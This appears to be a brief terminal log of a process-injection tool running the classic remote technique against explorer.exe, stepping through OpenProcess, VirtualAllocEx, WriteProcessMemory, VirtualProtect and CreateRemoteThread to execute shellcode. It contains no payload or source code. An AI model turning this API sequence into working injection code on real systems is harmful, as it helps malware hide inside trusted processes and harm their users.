$ ./injector.exe --target explorer.exe --technique classic-remote
[*] Target PID: 2048 · Opening handle with OpenProcess...
[+] Handle obtained · Allocating RW memory with VirtualAllocEx...
[+] Memory @ 0x7FFF0000 · Writing shellcode with WriteProcessMemory...
[+] 1024 bytes written · Changing perms RW→RX with VirtualProtect...
[+] CreateRemoteThread · Thread ID: 0x3F8 → shellcode executing
$ ls ./techniques | wc -l
25 techniques indexed
$ _